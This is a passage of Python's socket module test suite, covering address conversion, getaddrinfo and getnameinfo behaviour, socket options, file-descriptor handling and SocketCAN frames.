assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
